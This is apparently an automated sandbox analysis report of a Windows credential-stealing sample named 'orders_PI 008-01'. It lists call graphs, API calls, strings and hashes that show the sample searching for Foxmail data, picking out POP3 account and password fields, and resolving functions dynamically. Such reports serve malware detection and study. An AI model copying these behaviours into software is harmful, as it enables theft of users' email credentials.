6363 344bc82c 6358->6363 6359->6363 6370 344bc7e6 GetModuleHandleA 6359->6370 6360 344bc835 GetModuleHandleA 6364 344bc83f 6360->6364 6362 344bc872 6363->6360 6363->6362 6363->6364 6364->6363 6366 344bc85f GetProcAddress 6364->6366 6365 344bc7dd 6365->6363 6365->6364 6367 344bc800 GetProcAddress 6365->6367 6366->6363 6367->6363 6368 344bc80d VirtualProtect 6367->6368 6368->6363 6369 344bc81c VirtualProtect 6368->6369 6369->6363 6371 344bc7ef 6370->6371 6377 344bc82c 6370->6377 6382 344bc803 GetProcAddress 6371->6382 6373 344bc7f4 6376 344bc800 GetProcAddress 6373->6376 6373->6377 6374 344bc872 6375 344bc835 GetModuleHandleA 6380 344bc83f 6375->6380 6376->6377 6378 344bc80d VirtualProtect 6376->6378 6377->6374 6377->6375 6377->6380 6378->6377 6379 344bc81c VirtualProtect 6378->6379 6379->6377 6380->6377 6381 344bc85f GetProcAddress 6380->6381 6381->6377 6383 344bc82c 6382->6383 6384 344bc80d VirtualProtect 6382->6384 6386 344bc872 6383->6386 6387 344bc835 GetModuleHandleA 6383->6387 6384->6383 6385 344bc81c VirtualProtect 6384->6385 6385->6383 6389 344bc83f 6387->6389 6388 344bc85f GetProcAddress 6388->6389 6389->6383 6389->6388 7895 344b1f3f 7896 344b1f4b ___DestructExceptionObject 7895->7896 7913 344b247c 7896->7913 7898 344b1f52 7899 344b1f7c 7898->7899 7900 344b2041 7898->7900 7907 344b1f57 ___scrt_is_nonwritable_in_current_image 7898->7907 7924 344b23de 7899->7924 7902 344b2639 ___scrt_fastfail 4 API calls 7900->7902 7903 344b2048 7902->7903 7904 344b1f8b __RTC_Initialize 7904->7907 7927 344b22fc RtlInitializeSListHead 7904->7927 7906 344b1f99 ___scrt_initialize_default_local_stdio_options 7928 344b46c5 7906->7928 7911 344b1fb8 7911->7907 7912 344b4669 _abort 5 API calls 7911->7912 7912->7907 7914 344b2485 7913->7914 7936 344b2933 IsProcessorFeaturePresent 7914->7936 7918 344b2496 7919 344b249a 7918->7919 7947 344b53c8 7918->7947 7919->7898 7922 344b24b1 7922->7898 7923 344b3529 ___vcrt_uninitialize 8 API calls 7923->7919 7978 344b24b5 7924->7978 7926 344b23e5 7926->7904 7927->7906 7931 344b46dc 7928->7931 7929 344b2ada _ValidateLocalCookies 5 API calls 7930 344b1fad 7929->7930 7930->7907 7932 344b23b3 7930->7932 7931->7929 7933 344b23b8 ___scrt_release_startup_lock 7932->7933 7934 344b2933 ___isa_available_init IsProcessorFeaturePresent 7933->7934 7935 344b23c1 7933->7935 7934->7935 7935->7911 7937 344b2491 7936->7937 7938 344b34ea 7937->7938 7939 344b34ef ___vcrt_initialize_winapi_thunks 7938->7939 7950 344b3936 7939->7950 7942 344b34fd 7942->7918 7944 344b3505 7945 344b3510 7944->7945 7946 344b3972 ___vcrt_uninitialize_locks RtlDeleteCriticalSection 7944->7946 7945->7918 7946->7942 7974 344b7457 7947->7974 7951 344b393f 7950->7951 7953 344b3968 7951->7953 7955 344b34f9 7951->7955 7964 344b3be0 7951->7964 7954 344b3972 ___vcrt_uninitialize_locks RtlDeleteCriticalSection 7953->7954 7954->7955 7955->7942 7956 344b38e8 7955->7956 7969 344b3af1 7956->7969 7958 344b38fd 7958->7944 7960 344b3ba2 ___vcrt_FlsSetValue 6 API calls 7961 344b390b 7960->7961 7962 344b3918 7961->7962 7963 344b391b ___vcrt_uninitialize_ptd 6 API calls 7961->7963 7962->7944 7963->7958 7965 344b3a82 try_get_function 5 API calls 7964->7965 7966 344b3bfa 7965->7966 7967 344b3c18 InitializeCriticalSectionAndSpinCount 7966->7967 7968 344b3c03 7966->7968 7967->7968 7968->7951 7970 344b3a82 try_get_function 5 API calls 7969->7970 7971 344b3b0b 7970->7971 7972 344b3b24 TlsAlloc 7971->7972 7973 344b38f2 7971->7973 7973->7958 7973->7960 7975 344b7470 7974->7975 7976 344b2ada _ValidateLocalCookies 5 API calls 7975->7976 7977 344b24a3 7976->7977 7977->7922 7977->7923 7979 344b24c8 7978->7979 7980 344b24c4 7978->7980 7981 344b2639 ___scrt_fastfail 4 API calls 7979->7981 7983 344b24d5 ___scrt_release_startup_lock 7979->7983 7980->7926 7982 344b2559 7981->7982 7983->7926 8184 344b67bf 8189 344b67f4 8184->8189 8187 344b67db 8188 344b571e _free 20 API calls 8188->8187 8190 344b67cd 8189->8190 8191 344b6806 8189->8191 8190->8187 8190->8188 8192 344b680b 8191->8192 8193 344b6836 8191->8193 8194 344b637b __dosmaperr 20 API calls 8192->8194 8193->8190 8200 344b71d6 8193->8200 8196 344b6814 8194->8196 8198 344b571e _free 20 API calls 8196->8198 8197 344b6851 8199 344b571e _free 20 API calls 8197->8199 8198->8190 8199->8190 8201 344b71e1 8200->8201 8202 344b7209 8201->8202 8203 344b71fa 8201->8203 8204 344b7218 8202->8204 8209 344b8a98 8202->8209 8205 344b6368 _free 20 API calls 8203->8205 8216 344b8acb 8204->8216 8207 344b71ff ___scrt_fastfail 8205->8207 8207->8197 8210 344b8ab8 RtlSizeHeap 8209->8210 8211 344b8aa3 8209->8211 8210->8204 8212 344b6368 _free 20 API calls 8211->8212 8213 344b8aa8 8212->8213 8214 344b62ac ___std_exception_copy 26 API calls 8213->8214 8215 344b8ab3 8214->8215 8215->8204 8217 344b8ad8 8216->8217 8218 344b8ae3 8216->8218 8219 344b56d0 21 API calls 8217->8219 8220 344b8aeb 8218->8220 8227 344b8af4 __dosmaperr 8218->8227 8224 344b8ae0 8219->8224 8221 344b571e _free 20 API calls 8220->8221 8221->8224 8222 344b8af9 8225 344b6368 _free 20 API calls 8222->8225 8223 344b8b1e RtlReAllocateHeap 8223->8224 8223->8227 8224->8207 8225->8224 8226 344b474f __dosmaperr 7 API calls 8226->8227 8227->8222 8227->8223 8227->8226 6995 344b543d 6996 344b5440 6995->6996 6997 344b55a8 _abort 38 API calls 6996->6997 6998 344b544c 6997->6998 7473 344b3eb3 7474 344b5411 38 API calls 7473->7474 7475 344b3ebb 7474->7475 6999 344b5630 7000 344b563b 6999->7000 7002 344b5664 7000->7002 7003 344b5660 7000->7003 7005 344b5eb7 7000->7005 7012 344b5688 7002->7012 7006 344b5c45 __dosmaperr 5 API calls 7005->7006 7007 344b5ede 7006->7007 7008 344b5efc InitializeCriticalSectionAndSpinCount 7007->7008 7009 344b5ee7 7007->7009 7008->7009 7010 344b2ada _ValidateLocalCookies 5 API calls 7009->7010 7011 344b5f13 7010->7011 7011->7000 7013 344b5695 7012->7013 7015 344b56b4 7012->7015 7014 344b569f RtlDeleteCriticalSection 7013->7014 7014->7014 7014->7015 7015->7003

                                        Executed Functions

                                        Function 344B10F1 Relevance: 12.1, APIs: 8, Instructions: 88stringfileCOMMON
                                        Download Yara Rule

                                        Control-flow Graph

                                        APIs
                                        • lstrlenW.KERNEL32(?,?,?,?,?,00000000), ref: 344B1137
                                        • lstrcatW.KERNEL32(?,?,?,?,?,?,?,?,?,00000000), ref: 344B1151
                                        • lstrlenW.KERNEL32(?,?,?,?,?,?,?,?,00000000), ref: 344B115C
                                        • lstrlenW.KERNEL32(?,?,?,?,?,?,?,?,00000000), ref: 344B116D
                                        • lstrlenW.KERNEL32(?,?,?,?,?,?,?,?,00000000), ref: 344B117C
                                        • FindFirstFileW.KERNEL32(?,?,?,?,?,?,?,?,?,00000000), ref: 344B1193
                                        • FindNextFileW.KERNELBASE(00000000,00000010), ref: 344B11D0
                                        • FindClose.KERNEL32(00000000), ref: 344B11DB
                                        Memory Dump Source
                                        • Source File: 00000003.00000002.3908301420.00000000344B1000.00000040.00001000.00020000.00000000.sdmp, Offset: 344B0000, based on PE: true
                                        • Associated: 00000003.00000002.3908283025.00000000344B0000.00000004.00001000.00020000.00000000.sdmpDownload File
                                        • Associated: 00000003.00000002.3908301420.00000000344C6000.00000040.00001000.00020000.00000000.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_3_2_344b0000_orders_PI 008-01.jbxd
                                        Similarity
                                        • API ID: lstrlen$Find$File$CloseFirstNextlstrcat
                                        • String ID:
                                        • API String ID: 1083526818-0
                                        • Opcode ID: 3631df396d4e8c5b81256cc1c50522bdb88f55fb2c79fe159e80d15f64cba54e
                                        • Instruction ID: 6bd7a07a22a79095eaafd9c73f0d2d190c41320cf25d6eb796e4a0d9220f3124
                                        • Opcode Fuzzy Hash: 3631df396d4e8c5b81256cc1c50522bdb88f55fb2c79fe159e80d15f64cba54e
                                        • Instruction Fuzzy Hash: 8B219575504748ABDB10DA749C4CF9B7B9CEF44358F00093EB5D8D3191EB30D60587A6
                                        Function 344B12EE Relevance: 24.7, APIs: 11, Strings: 3, Instructions: 243stringCOMMON
                                        Download Yara Rule

                                        Control-flow Graph

                                        APIs
                                        • GetEnvironmentVariableW.KERNEL32(ProgramFiles,?,00000104), ref: 344B1434
                                          • Part of subcall function 344B10F1: lstrlenW.KERNEL32(?,?,?,?,?,00000000), ref: 344B1137
                                          • Part of subcall function 344B10F1: lstrcatW.KERNEL32(?,?,?,?,?,?,?,?,?,00000000), ref: 344B1151
                                          • Part of subcall function 344B10F1: lstrlenW.KERNEL32(?,?,?,?,?,?,?,?,00000000), ref: 344B115C
                                          • Part of subcall function 344B10F1: lstrlenW.KERNEL32(?,?,?,?,?,?,?,?,00000000), ref: 344B116D
                                          • Part of subcall function 344B10F1: lstrlenW.KERNEL32(?,?,?,?,?,?,?,?,00000000), ref: 344B117C
                                          • Part of subcall function 344B10F1: FindFirstFileW.KERNEL32(?,?,?,?,?,?,?,?,?,00000000), ref: 344B1193
                                          • Part of subcall function 344B10F1: FindNextFileW.KERNELBASE(00000000,00000010), ref: 344B11D0
                                          • Part of subcall function 344B10F1: FindClose.KERNEL32(00000000), ref: 344B11DB
                                        • lstrlenW.KERNEL32(?), ref: 344B14C5
                                        • lstrlenW.KERNEL32(?), ref: 344B14E0
                                        • lstrlenW.KERNEL32(?,?), ref: 344B150F
                                        • lstrcatW.KERNEL32(00000000), ref: 344B1521
                                        • lstrlenW.KERNEL32(?,?), ref: 344B1547
                                        • lstrcatW.KERNEL32(00000000), ref: 344B1553
                                        • lstrlenW.KERNEL32(?,?), ref: 344B1579
                                        • lstrcatW.KERNEL32(00000000), ref: 344B1585
                                        • lstrlenW.KERNEL32(?,?), ref: 344B15AB
                                        • lstrcatW.KERNEL32(00000000), ref: 344B15B7
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000003.00000002.3908301420.00000000344B1000.00000040.00001000.00020000.00000000.sdmp, Offset: 344B0000, based on PE: true
                                        • Associated: 00000003.00000002.3908283025.00000000344B0000.00000004.00001000.00020000.00000000.sdmpDownload File
                                        • Associated: 00000003.00000002.3908301420.00000000344C6000.00000040.00001000.00020000.00000000.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_3_2_344b0000_orders_PI 008-01.jbxd
                                        Similarity
                                        • API ID: lstrlen$lstrcat$Find$File$CloseEnvironmentFirstNextVariable
                                        • String ID: )$Foxmail$ProgramFiles
                                        • API String ID: 672098462-2938083778
                                        • Opcode ID: 74bbdbe8c74fc574da82a2b6bbca87d548d1289d7fe4199301ef4705b928d2f7
                                        • Instruction ID: bed7b6fad0716f0e895a4f5beaf410f4d77d1fa68f1e7a4ce21ba6191b3ba482
                                        • Opcode Fuzzy Hash: 74bbdbe8c74fc574da82a2b6bbca87d548d1289d7fe4199301ef4705b928d2f7
                                        • Instruction Fuzzy Hash: 3C81B275A00368BAEF20DBA0DC45FDE7379EF84700F0005AAF649E7191EA715A85CFA5
                                        Function 344BC7E6 Relevance: 9.1, APIs: 6, Instructions: 65libraryloaderCOMMON
                                        Download Yara Rule

                                        Control-flow Graph

                                        APIs
                                        • GetModuleHandleA.KERNEL32(344BC7DD), ref: 344BC7E6
                                        • GetModuleHandleA.KERNEL32(?,344BC7DD), ref: 344BC838
                                        • GetProcAddress.KERNEL32(00000000,00000000), ref: 344BC860
                                          • Part of subcall function 344BC803: GetProcAddress.KERNEL32(00000000,344BC7F4), ref: 344BC804
                                          • Part of subcall function 344BC803: VirtualProtect.KERNEL32(?,00000078,?,?,00000000,00000000,344BC7F4,344BC7DD), ref: 344BC816
                                          • Part of subcall function 344BC803: VirtualProtect.KERNEL32(?,00000078,?,?,?,00000000,00000000,344BC7F4,344BC7DD), ref: 344BC82A
                                        Memory Dump Source
                                        • Source File: 00000003.00000002.3908301420.00000000344B1000.00000040.00001000.00020000.00000000.sdmp, Offset: 344B0000, based on PE: true
                                        • Associated: 00000003.00000002.3908283025.00000000344B0000.00000004.00001000.00020000.00000000.sdmpDownload File
                                        • Associated: 00000003.00000002.3908301420.00000000344C6000.00000040.00001000.00020000.00000000.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_3_2_344b0000_orders_PI 008-01.jbxd
                                        Similarity
                                        • API ID: AddressHandleModuleProcProtectVirtual
                                        • String ID:
                                        • API String ID: 2099061454-0
                                        • Opcode ID: 18a205e926d3f8c1bd8ceb8f3c836a0ea39c7540959748e6d39d93322aab4e9f
                                        • Instruction ID: fb239d57ca10ffcd10bdc1f33bb25909a49a561c160fb4be6d7e7b7858350afe
                                        • Opcode Fuzzy Hash: 18a205e926d3f8c1bd8ceb8f3c836a0ea39c7540959748e6d39d93322aab4e9f
                                        • Instruction Fuzzy Hash: E201D244A45F41BCBF1156740CC5AAA5F989B276A3B50EB7EE0D0CA293D9A08506C3F6
                                        Function 344BC7A7 Relevance: 7.6, APIs: 5, Instructions: 100libraryloaderCOMMON
                                        Download Yara Rule

                                        Control-flow Graph

                                        • Executed
                                        • Not Executed
                                        control_flow_graph 79 344bc7a7-344bc7bc 80 344bc7be-344bc7c6 79->80 81 344bc82d 79->81 80->81 83 344bc7c8-344bc7f6 call 344bc7e6 80->83 82 344bc82f-344bc833 81->82 84 344bc872 call 344bc877 82->84 85 344bc835-344bc83d GetModuleHandleA 82->85 91 344bc7f8 83->91 92 344bc86c-344bc86e 83->92 88 344bc83f-344bc847 85->88 88->88 90 344bc849-344bc84c 88->90 90->82 93 344bc84e-344bc850 90->93 96 344bc85b-344bc85e 91->96 97 344bc7fa-344bc7fe 91->97 94 344bc870 92->94 95 344bc866-344bc86b 92->95 100 344bc852-344bc854 93->100 101 344bc856-344bc85a 93->101 94->90 95->92 99 344bc85f-344bc860 GetProcAddress 96->99 102 344bc800-344bc80b GetProcAddress 97->102 103 344bc865 97->103 99->103 100->99 101->96 102->81 104 344bc80d-344bc81a VirtualProtect 102->104 103->95 105 344bc82c 104->105 106 344bc81c-344bc82a VirtualProtect 104->106 105->81 106->105
                                        APIs
                                        • GetModuleHandleA.KERNEL32(?,344BC7DD), ref: 344BC838
                                        • GetProcAddress.KERNEL32(00000000,00000000), ref: 344BC860
                                          • Part of subcall function 344BC7E6: GetModuleHandleA.KERNEL32(344BC7DD), ref: 344BC7E6
                                          • Part of subcall function 344BC7E6: GetProcAddress.KERNEL32(00000000,344BC7F4), ref: 344BC804
                                          • Part of subcall function 344BC7E6: VirtualProtect.KERNEL32(?,00000078,?,?,00000000,00000000,344BC7F4,344BC7DD), ref: 344BC816
                                          • Part of subcall function 344BC7E6: VirtualProtect.KERNEL32(?,00000078,?,?,?,00000000,00000000,344BC7F4,344BC7DD), ref: 344BC82A
                                        Memory Dump Source
                                        • Source File: 00000003.00000002.3908301420.00000000344B1000.00000040.00001000.00020000.00000000.sdmp, Offset: 344B0000, based on PE: true
                                        • Associated: 00000003.00000002.3908283025.00000000344B0000.00000004.00001000.00020000.00000000.sdmpDownload File
                                        • Associated: 00000003.00000002.3908301420.00000000344C6000.00000040.00001000.00020000.00000000.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_3_2_344b0000_orders_PI 008-01.jbxd
                                        Similarity
                                        • API ID: AddressHandleModuleProcProtectVirtual
                                        • String ID:
                                        • API String ID: 2099061454-0
                                        • Opcode ID: 731a18adefd9f684ec9123585341c8004b06a9316977ab842e52f252e525921e
                                        • Instruction ID: d62451d44d80999ab1ce2e16ba5a93d3efa78a2c921df8eb960bb41e7bad48e6
                                        • Opcode Fuzzy Hash: 731a18adefd9f684ec9123585341c8004b06a9316977ab842e52f252e525921e
                                        • Instruction Fuzzy Hash: 9821F765548A816FFF118B744C846A66FD99B172A2F19CABED0C0CB243D5A88446C3F6
                                        Function 344BC803 Relevance: 7.6, APIs: 5, Instructions: 54librarymemoryloaderCOMMON
                                        Download Yara Rule

                                        Control-flow Graph

                                        • Executed
                                        • Not Executed
                                        control_flow_graph 107 344bc803-344bc80b GetProcAddress 108 344bc82d 107->108 109 344bc80d-344bc81a VirtualProtect 107->109 112 344bc82f-344bc833 108->112 110 344bc82c 109->110 111 344bc81c-344bc82a VirtualProtect 109->111 110->108 111->110 113 344bc872 call 344bc877 112->113 114 344bc835-344bc83d GetModuleHandleA 112->114 116 344bc83f-344bc847 114->116 116->116 117 344bc849-344bc84c 116->117 117->112 118 344bc84e-344bc850 117->118 119 344bc852-344bc854 118->119 120 344bc856-344bc85e 118->120 122 344bc85f-344bc865 GetProcAddress 119->122 120->122 124 344bc866-344bc86e 122->124 126 344bc870 124->126 126->117
                                        APIs
                                        • GetProcAddress.KERNEL32(00000000,344BC7F4), ref: 344BC804
                                        • VirtualProtect.KERNEL32(?,00000078,?,?,00000000,00000000,344BC7F4,344BC7DD), ref: 344BC816
                                        • VirtualProtect.KERNEL32(?,00000078,?,?,?,00000000,00000000,344BC7F4,344BC7DD), ref: 344BC82A
                                        • GetModuleHandleA.KERNEL32(?,344BC7DD), ref: 344BC838
                                        • GetProcAddress.KERNEL32(00000000,00000000), ref: 344BC860
                                        Memory Dump Source
                                        • Source File: 00000003.00000002.3908301420.00000000344B1000.00000040.00001000.00020000.00000000.sdmp, Offset: 344B0000, based on PE: true
                                        • Associated: 00000003.00000002.3908283025.00000000344B0000.00000004.00001000.00020000.00000000.sdmpDownload File
                                        • Associated: 00000003.00000002.3908301420.00000000344C6000.00000040.00001000.00020000.00000000.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_3_2_344b0000_orders_PI 008-01.jbxd
                                        Similarity
                                        • API ID: AddressProcProtectVirtual$HandleModule
                                        • String ID:
                                        • API String ID: 2152742572-0
                                        • Opcode ID: f81dfe0726a7f77e278230a0c4648d339da411b55a21776b762b5ef698216b3c
                                        • Instruction ID: 3b9aa3b18dee0ad21c56d6500e45b0308baf951e3b24e7ff3ecfa048f86827c4
                                        • Opcode Fuzzy Hash: f81dfe0726a7f77e278230a0c4648d339da411b55a21776b762b5ef698216b3c
                                        • Instruction Fuzzy Hash: CFF0C285685F407CFE2146B40CC1AB65FCC8B676A3B10AA7EE1D0CB283D895850683F6

                                        Non-executed Functions

                                        Function 344B60E2 Relevance: 4.6, APIs: 3, Instructions: 78COMMONLIBRARYCODE
                                        Download Yara Rule
                                        APIs
                                        • IsDebuggerPresent.KERNEL32(?,?,?,?,?,00000000), ref: 344B61DA
                                        • SetUnhandledExceptionFilter.KERNEL32(00000000,?,?,?,?,?,00000000), ref: 344B61E4
                                        • UnhandledExceptionFilter.KERNEL32(?,?,?,?,?,?,00000000), ref: 344B61F1
                                        Memory Dump Source
                                        • Source File: 00000003.00000002.3908301420.00000000344B1000.00000040.00001000.00020000.00000000.sdmp, Offset: 344B0000, based on PE: true
                                        • Associated: 00000003.00000002.3908283025.00000000344B0000.00000004.00001000.00020000.00000000.sdmpDownload File
                                        • Associated: 00000003.00000002.3908301420.00000000344C6000.00000040.00001000.00020000.00000000.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_3_2_344b0000_orders_PI 008-01.jbxd
                                        Similarity
                                        • API ID: ExceptionFilterUnhandled$DebuggerPresent
                                        • String ID:
                                        • API String ID: 3906539128-0
                                        • Opcode ID: b8d346c25d32f19fa3042759474808472ac00714ef6f69188682acc6f88d5a52
                                        • Instruction ID: 984b42f3fa7fccef10859ec550c7d1cc003354977efe0da48480b5da60c424d3
                                        • Opcode Fuzzy Hash: b8d346c25d32f19fa3042759474808472ac00714ef6f69188682acc6f88d5a52
                                        • Instruction Fuzzy Hash: 5B31C67590121C9BDF21DF64D98878DBBB4FF08310F5041EAE85CA7261E7709B858F55
                                        Function 344B4AB4 Relevance: 4.5, APIs: 3, Instructions: 20COMMONLIBRARYCODE
                                        Download Yara Rule
                                        APIs
                                        • GetCurrentProcess.KERNEL32(?,?,344B4A8A,?,344C2238,?,344B4BBD,00000000,00000000,?,344B2082,344C2108,?,344B1F3A,?), ref: 344B4AD5
                                        • TerminateProcess.KERNEL32(00000000,?,344B4A8A,?,344C2238,?,344B4BBD,00000000,00000000,?,344B2082,344C2108,?,344B1F3A,?), ref: 344B4ADC
                                        • ExitProcess.KERNEL32 ref: 344B4AEE
                                        Memory Dump Source
                                        • Source File: 00000003.00000002.3908301420.00000000344B1000.00000040.00001000.00020000.00000000.sdmp, Offset: 344B0000, based on PE: true
                                        • Associated: 00000003.00000002.3908283025.00000000344B0000.00000004.00001000.00020000.00000000.sdmpDownload File
                                        • Associated: 00000003.00000002.3908301420.00000000344C6000.00000040.00001000.00020000.00000000.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_3_2_344b0000_orders_PI 008-01.jbxd
                                        Similarity
                                        • API ID: Process$CurrentExitTerminate
                                        • String ID:
                                        • API String ID: 1703294689-0
                                        • Opcode ID: ca970a007489f54ef6ae2aeea21e8dc01697c2b160d1fbe5bc28a388b57a917d
                                        • Instruction ID: d78f9d5579900fc03bd1cac91791bdff6fc89e9305aab5925cadbbec6cd2e2a4
                                        • Opcode Fuzzy Hash: ca970a007489f54ef6ae2aeea21e8dc01697c2b160d1fbe5bc28a388b57a917d
                                        • Instruction Fuzzy Hash: 30E0B67A004A08EFEF01AF65ED18A493B69EF48385B504478FAC5AB121DB35D943CA69
                                        Function 344B724E Relevance: 1.3, APIs: 1, Instructions: 5memoryCOMMON
                                        Download Yara Rule
                                        APIs
                                        Memory Dump Source
                                        • Source File: 00000003.00000002.3908301420.00000000344B1000.00000040.00001000.00020000.00000000.sdmp, Offset: 344B0000, based on PE: true
                                        • Associated: 00000003.00000002.3908283025.00000000344B0000.00000004.00001000.00020000.00000000.sdmpDownload File
                                        • Associated: 00000003.00000002.3908301420.00000000344C6000.00000040.00001000.00020000.00000000.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_3_2_344b0000_orders_PI 008-01.jbxd
                                        Similarity
                                        • API ID: HeapProcess
                                        • String ID:
                                        • API String ID: 54951025-0
                                        • Opcode ID: deb07a64a596fa0a94279717a71abccac9f18a1c9f24173b0eb13b021ffda558
                                        • Instruction ID: f26dab599cf828a9f8bd5bbb8303c2f18c097c5527c3ad69541c5aeb28a77f06
                                        • Opcode Fuzzy Hash: deb07a64a596fa0a94279717a71abccac9f18a1c9f24173b0eb13b021ffda558
                                        • Instruction Fuzzy Hash: F0A011B02002038FA308CE30828A20C3AACEA0028830880B8A808E0000FB2088028A08
                                        Function 344B173A Relevance: 30.0, APIs: 5, Strings: 12, Instructions: 210COMMON
                                        Download Yara Rule

                                        Control-flow Graph

                                        • Executed
                                        • Not Executed
                                        control_flow_graph 136 344b173a-344b17fe call 344bc030 call 344b2c40 * 2 143 344b1803 call 344b1cca 136->143 144 344b1808-344b180c 143->144 145 344b19ad-344b19b1 144->145 146 344b1812-344b1816 144->146 146->145 147 344b181c-344b1837 call 344b1ede 146->147 150 344b199f-344b19ac call 344b1ee7 * 2 147->150 151 344b183d-344b1845 147->151 150->145 153 344b184b-344b184e 151->153 154 344b1982-344b1985 151->154 153->154 158 344b1854-344b1881 call 344b44b0 * 2 call 344b1db7 153->158 156 344b1987 154->156 157 344b1995-344b1999 154->157 160 344b198a-344b198d call 344b2c40 156->160 157->150 157->151 170 344b193d-344b1943 158->170 171 344b1887-344b189f call 344b44b0 call 344b1db7 158->171 166 344b1992 160->166 166->157 173 344b197e-344b1980 170->173 174 344b1945-344b1947 170->174 171->170 187 344b18a5-344b18a8 171->187 173->160 174->173 175 344b1949-344b194b 174->175 177 344b194d-344b194f 175->177 178 344b1961-344b197c call 344b16aa 175->178 180 344b1951-344b1953 177->180 181 344b1955-344b1957 177->181 178->166 180->178 180->181 184 344b1959-344b195b 181->184 185 344b195d-344b195f 181->185 184->178 184->185 185->173 185->178 188 344b18aa-344b18c2 call 344b44b0 call 344b1db7 187->188 189 344b18c4-344b18dc call 344b44b0 call 344b1db7 187->189 188->189 198 344b18e2-344b193b call 344b16aa call 344b15da call 344b2c40 * 2 188->198 189->157 189->198 198->157
                                        APIs
                                          • Part of subcall function 344B1CCA: CopyFileW.KERNEL32(?,?,00000000,?,?,?,?,?,?,00000000), ref: 344B1D1B
                                          • Part of subcall function 344B1CCA: CreateFileW.KERNEL32(?,80000000,00000000,00000000,?,00000080,00000000,?,?,00000000), ref: 344B1D37
                                          • Part of subcall function 344B1CCA: DeleteFileW.KERNEL32(?,?,?,00000000,?,?,?,?,?,?,00000000), ref: 344B1D4B
                                        • _strlen.LIBCMT ref: 344B1855
                                        • _strlen.LIBCMT ref: 344B1869
                                        • _strlen.LIBCMT ref: 344B188B
                                        • _strlen.LIBCMT ref: 344B18AE
                                        • _strlen.LIBCMT ref: 344B18C8
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000003.00000002.3908301420.00000000344B1000.00000040.00001000.00020000.00000000.sdmp, Offset: 344B0000, based on PE: true
                                        • Associated: 00000003.00000002.3908283025.00000000344B0000.00000004.00001000.00020000.00000000.sdmpDownload File
                                        • Associated: 00000003.00000002.3908301420.00000000344C6000.00000040.00001000.00020000.00000000.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_3_2_344b0000_orders_PI 008-01.jbxd
                                        Similarity
                                        • API ID: _strlen$File$CopyCreateDelete
                                        • String ID: Acco$Acco$POP3$POP3$Pass$Pass$t$t$un$un$word$word
                                        • API String ID: 3296212668-3023110444
                                        • Opcode ID: 6f2763eb29f99e55b9fa1c4501e1124463a6139b8cfee53aa49ae728a3ea04e1
                                        • Instruction ID: f9f5e514d62640231d246f71791c9e1a73f7a3d3fac69ba5501589487bfeaf6a
                                        • Opcode Fuzzy Hash: 6f2763eb29f99e55b9fa1c4501e1124463a6139b8cfee53aa49ae728a3ea04e1
                                        • Instruction Fuzzy Hash: 89611575D00258AFFF118BA4DC80BDEB7B9AF05284F40447ED1C6A7255EB705A46CBB2
                                        Function 344B19B2 Relevance: 26.5, APIs: 11, Strings: 4, Instructions: 218COMMON
                                        Download Yara Rule

                                        Control-flow Graph

                                        APIs
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000003.00000002.3908301420.00000000344B1000.00000040.00001000.00020000.00000000.sdmp, Offset: 344B0000, based on PE: true
                                        • Associated: 00000003.00000002.3908283025.00000000344B0000.00000004.00001000.00020000.00000000.sdmpDownload File
                                        • Associated: 00000003.00000002.3908301420.00000000344C6000.00000040.00001000.00020000.00000000.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_3_2_344b0000_orders_PI 008-01.jbxd
                                        Similarity
                                        • API ID: _strlen
                                        • String ID: %m$~$Gon~$~F@7$~dra
                                        • API String ID: 4218353326-230879103
                                        • Opcode ID: 5313ffee17f5d615fcbb67a61029f9413697531bcd3fb870ba25ca75e457194f
                                        • Instruction ID: c807b0a70ab0258bdbb8d341bd0af5c5d05108d45da5cc07a2c8cbcc506676b6
                                        • Opcode Fuzzy Hash: 5313ffee17f5d615fcbb67a61029f9413697531bcd3fb870ba25ca75e457194f
                                        • Instruction Fuzzy Hash: 847106B5D002289FEF129BB49C94ADF7BFCAF09244F5440AAD5C4D7242E6749785CBB0
                                        Function 004034A2 Relevance: 21.1, APIs: 10, Strings: 2, Instructions: 80stringCOMMON
                                        Download Yara Rule

                                        Control-flow Graph

                                        APIs
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000003.00000002.3879383872.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000003.00000002.3879368188.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.3879403378.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.3879455624.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.3879598230.00000000007DE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.3879598230.000000000081E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_3_2_400000_orders_PI 008-01.jbxd
                                        Similarity
                                        • API ID: ErrorModeVersionlstrlen
                                        • String ID: NSIS Error$UXTHEME
                                        • API String ID: 758611499-110662866
                                        • Opcode ID: 98ae8c372d86054e2ccc96880edf90e48c3094bace8399af63df6374aa7df77d
                                        • Instruction ID: 31efa2035741e65c501781d23eca1476aa9478ce53cbfb8e56932e36a8718c69
                                        • Opcode Fuzzy Hash: 98ae8c372d86054e2ccc96880edf90e48c3094bace8399af63df6374aa7df77d
                                        • Instruction Fuzzy Hash: ED21A3B0500304AFD7107F61AE49B1B3A68AB41719F05843EF986BA2D1CF7C5A49CB6E
                                        Function 344B7CC2 Relevance: 19.6, APIs: 13, Instructions: 114COMMONLIBRARYCODE
                                        Download Yara Rule

                                        Control-flow Graph

                                        • Executed
                                        • Not Executed
